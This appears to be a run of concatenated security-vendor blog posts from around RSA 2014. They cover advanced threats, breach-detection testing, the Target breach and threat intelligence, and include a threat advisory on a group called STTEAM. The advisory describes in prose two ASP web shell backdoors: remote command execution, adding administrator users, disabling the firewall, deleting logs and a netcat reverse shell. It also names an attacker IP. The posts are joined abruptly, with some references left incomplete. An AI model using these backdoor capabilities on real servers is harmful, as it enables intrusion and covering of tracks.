A true advanced threat is a “who”, not a “how.” All too often we equate an advanced threat with the new 0-day exploit or targeted malware, but these are not the threats, they are the tactics of the attacker.
Security vendors have pulled the perfect long-con on the world by convincing us that Advanced Threat Defense (ATD) is malware or spear phishing or browser exploits, and ignoring the fact that at the other end of that spear phish is someone with a propensity to break into your network in any way possible. Are we to believe that since advanced malware vendors may detect a new browser exploit that they have actually stopped the attacker from accessing your network? No. True advanced threats, the people that want your data, will pound and pound on the door until they knock it off the hinges. Of course these niche Advanced Tactic Detection ATD products have a place to try to detect a portion of the attempts to breach the network. What is really core to the defense against advanced threats is the ability to find them in your network.
What the heck does a graphic like this have to do with security (or surfing – my other favorite topic)? Well, nothing to do with surfing (except the dude in the front could use a better suit), but a lot to do with security… Please humor me, grab a cup of coffee and read on…
While we are all fighting the good fight against cyber attacks and threats every day, it’s important to also test ourselves in other ways – namely independent lab testing that evaluates vendors based on their technologies’ capabilities. As you may remember from over the summer, we participated in NSS Labs’ Breach Detection System (BDS) test alongside other security vendors – originally ten companies (AhnLab, Damballa, FireEye, Lastline, McAfee, Palo Alto Networks, Sourcefire, Symantec, Trend Micro and Fidelis) were called to the table, but only three (AhnLab, FireEye and Fidelis) were able to make it through and only two (AhnLab and Fidelis) chose to make their results public for our customers.
Turns out, there is a lot of hand waiving, marketing and smoke out there from security vendors, but not a lot of truth in the picture.
On March 14th, Bloomberg BusinessWeek published a lengthy article entitled, “Missed Alarms and 40 Million Stolen Credit Card Numbers: How Target Blew It”. The article highlighted the fact that Target had purchased $1.6M in FireEye advanced threat defense gear that had indeed detected two related pieces of malware on the Target network, but that Target had failed to respond to the alerts issued by the MSSP in Bangalore that was monitoring the equipment.
Unfortunately, we see this all too often in the network incident response investigations we are called on to conduct. Companies pay good money for network security tools with the expectation the technology will protect them from a breach. Unfortunately, that is often not the case! Where is the disconnect? Were the tools oversold? Were they implemented incorrectly? Were they poorly tuned? Or were incident response personnel not properly trained to understand the alerts and data provided by the tools? These are the questions Target and its incident response providers need to grapple with in order to develop effective remediation strategies and avoid a reoccurrence in the future.
A number of subsequent articles focused on whether Target should have reacted to these alerts. Many of the articles provided balanced perspectives on the challenges of responding to a few specific alerts against the background noise of hundreds, often thousands of attacks hitting large networks every day.
What these articles uniformly missed was the crucial question of why did the network security systems employed by Target provide so few actionable alerts….so late in the life cycle of the attack?
Once again, the trifecta of the Fidelis Customer Advisory Board gathering, the AGC Infosecurity Conference and RSA 2014 delivered tremendous insights and validation. The need for speed, which I talked about in my pre-RSA post was a key theme. And after more than 100 hours of conversation with customers, threat researchers, industry colleagues and experts, I am even more certain the only way to minimize the time to threat discovery, containment and remediation is to achieve an optimal combination of technology, knowledge and experience, and threat intelligence.
As I walked the aisles of both the Moscone South and North halls, I found the experience to be a metaphor for what’s going on in the network. There was a lot of noise and promise but also a lack of clarity . I thought the South hall had a better vibe and more energy, and a collection of vendors who are all about innovation. The North hall was more about the “big guys” in cavernous booths, many of whom were talking cybersecurity as a veil over their infrastructure business, rather than a core competency.
However, no matter which hall you were in, everyone’s messages sounded the same, making it virtually impossible for customers to discern what’s real and what isn’t or how each vendor can help them.
Unfortunately, the challenge for customers is far greater than just sifting through the confusing vendor landscape to figure out who meets their needs. For the most part, the disruptive forces were consistent from a year ago – advanced threats, big data, cloud and there was also increasing conversation about the Internet of Things adding complexity to securing this ever expanding attack surface.
What took the RSA 2014 environment from confusing to frenzied was the backdrop presented by the relevance and immediacy of the retailer breaches, the backdoors and privacy issues, potential legislation, and even macroeconomic questions around whether customers outside of the U.S. will shy away from buying technology from American companies. In many cases, it was these topics dominating the conversation in the booths and over drinks and dinner.
We’ve seen an increasing focus on threat intelligence with more companies offering it than there were a year ago, and the emergence of informal groups acknowledging they have things in common and agreeing to share threat intelligence. Even with this, I believe threat intelligence is truly in its embryonic stage. There are so many questions and opportunities for improvement -- the most significant today being, 1) How can we anonymize threat information so it can be shared more widely across relevant communities – verticals, geographies – to defend against a common enemy?; and 2) How can we improve the fidelity of the feeds?
At the Fidelis Customer Advisory Board meeting, we had overwhelming interest in customers wanting to contribute anonymized threat intelligence information so we can make it actionable on our advanced threat defense platform even more quickly. (In response to this, we are planning to create a virtual community that will enable this, but more on that another day.)
This is good forward progress. But the reality is that no one is satisfied with the threat intelligence available today, primarily because of how noisy networks are and how hard it is to determine what’s real and what isn’t (just like the environment at RSA 2014!). Customers want to know what the 10 most dangerous threats are in their network that they need to hunt down and deal with. They don’t have the ability to hunt and capture 100, and the worst part is they are seeing 1,000 alerts that make the entire process unmanageable.
So as an industry, we have our marching orders: We need to deliver high fidelity, high quality threat intelligence.
We already have analysts aggregating sources of data and coming up with situational awareness about a problem. We need to keep advancing our efforts to fuse that data together and reduce the time it takes to discover valid information in that data. We need to figure out how to factor in classified data that no one can get access to. And we need to do this against a back drop of legislative and privacy issues, in a threat environment that is not standing still, and in a business climate where advancements are outpacing the ability to secure everything. Said another way, in a world in which is it becoming easier, not harder, for an adversary to succeed in having its way with its target.
Is it exciting to be eyeball-deep in cybersecurity? It sure is. Is it scary? It sure is. To-date we’ve primarily dealt with adversaries whose primary goal has been disruption and theft. This has created a critical, global problem. If this turns to destruction, which many are predicting – think making 80,000 cars turn right when the driver wants to turn left ( The Internet of Things)– the criticality of the problem increases exponentially.
It might seem odd as the picture I’ve painted isn’t that encouraging. However I am more optimistic than ever after attending these meetings and shows that the formula is clear…smarter people, better tools and higher fidelity of the threat intelligence are the key to us catching up to the adversary. And I am confident this industry can come together and do it.
I welcome feedback and debate on this perspective.
'Security Intelligence' was a strong theme at RSAC 2014. This covered a wide gamut of activities, including the collection of data; analysis of collected data leading to actionable intelligence products, covering indicators that can be used for detection; and knowledge that can be used to enrich analysis post-detection, preferably with predictive value too. These cycles of the intelligence development process seemed to cover a large portion of the sessions, vendor messaging on the show floor as well as conversations that extended to the blogosphere, most notably here.
We made our own contribution to intelligence sharing at the RSA conference this year. We published a new Threat Advisory analyzing a new campaign called STTEAM targeting the Oil and Gas industry in the Middle East. We became aware of this threat when a specific organization was attacked and our investigation revealed a number of other targets across the region. This led to us publishing the paper with indicators that could be used by security analysts to determine if they saw signs of a compromise in their environments and by security researchers, who look to correlate our findings with their investigations into similar campaigns, potentially by the same threat actors.
We've also announced our partnership with ThreatConnect, a platform that allows for collaboration between security researchers through sharing of threat intelligence. Users can now directly import indicators that have been shared through ThreatConnect.
Additionally, we continue to invest in our integration of Yara, the fast-emerging standard in describing and classifying malware. While this provides our customers with another way of detecting and acting upon malicious activity in real time, it also enables them to share information about malware with others in the community, whether or not they use Fidelis XPS.
The conversations at RSAC 2014 helped confirm that while many of us in the research community continue to develop and distribute our own threat intelligence, more has to be done to allow enterprises to leverage the broader pool of intelligence that exists across industry and government. We look forward to participating in the realization of that goal.
In the past week, we have observed an increase attack activity against the Oil & Gas industry in the Middle East by a group of threat actors using the following handle: “STTEAM”. The group has also been observed attacking and compromising state government websites in the same area.
This group has compromised web pages from various organizations in the Middle East and have added some specific strings. We are providing those strings to local authorities to assist in identifying victim organizations.
Some of the compromised servers will display the following screen when accessed:
Once the websites are compromised, the group has been observed uploading two ASP Shell Backdoors. One of these ASP Shell Backdoors contains words in Turkish and appears to have been developed by someone going by the following handle:
This backdoor lets the attacker obtain system information, connect to SQL databases, list tables and execute commands, browse directories, perform file manipulations (upload, download, copy, delete, modify, searches, etc.), and perform folder manipulations (delete, copy, etc.).
The other ASP Shell Backdoor appears to be known as “K-Shell/ ZHC Shell 1.0 / Aspx Shell” and developed by two persons going by the handles of:
This backdoor contains most of the same features in the “Zehir4” backdoor, but it adds functionality to add a user to the system, add a user to the administrator’s group, disable the windows firewall, enable RDP, delete IIS logs, and start the netcat utility as a reverse backdoor shell.
We observed an attacker, with following IP address, trying to upload these backdoors into a victim system: “220.127.116.11”.
This document will provide information about these two ASP Shell Backdoors used by the threat actors in a recent incident. The information will provide functionality and network indicators.
Perhaps you've heard the old information security gag: "if you're a diver, you don't have to swim faster than the shark, just faster than your buddy." It's sometimes good for a chuckle and suggests that we should merely aspire to implement enough security to make us a less attractive target than our peers. Nowadays the joke is a little stale, because as Josh Corman points out in his recent TEDx talk*, sometimes the shark has a buddy too. As risks proliferate and as the bad guys of all kinds get better (badder?) at what they do, "good enough" security hasn't been remotely good enough for years. So I was particularly glad to have the opportunity to gather with some of our best and brightest customers this weekend at our second annual Customer Advisory Board meeting for a frank discussion about how we're all doing before we headed down to San Francisco for the annual RSA Conference.